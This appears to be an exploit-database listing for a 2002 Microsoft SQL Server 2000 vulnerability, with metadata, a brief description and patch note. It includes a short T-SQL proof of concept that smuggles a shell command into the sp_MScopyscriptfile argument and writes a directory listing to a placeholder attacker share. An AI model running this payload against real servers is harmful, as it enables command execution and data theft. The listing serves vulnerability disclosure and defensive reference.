header-logo
Suggest Exploit
vendor:
SQL Server
by:
SecurityFocus
7.5
CVSS
HIGH
Microsoft SQL Server 2000 DBCC Buffer Overflow
119
CWE
Product Name: SQL Server
Affected Version From: Microsoft SQL Server 2000
Affected Version To: Microsoft SQL Server 2000
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: o:microsoft:sql_server:2000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft SQL Server 2000 DBCC Buffer Overflow

A vulnerability exists in Microsoft SQL Server 2000 due to a buffer overflow in the Database Consistency Checkers (DBCC) utilities. An attacker can exploit this vulnerability by sending a specially crafted request to the server, which could allow the attacker to execute arbitrary code with the privilege level of the SQL Server service account.

Mitigation:

Microsoft has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5307/info

Microsoft SQL Server 2000 includes utilities called Database Consistency Checkers (DBCC). Several of these programs contain identical buffer overflows that, when exploited, could allow an attacker to execute arbitrary code with the privilege level of the SQL Server service account.

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "' 
exec sp_MScopyscriptfile @scripfile ,''

Navigation

Suggest Exploit

Services By CQR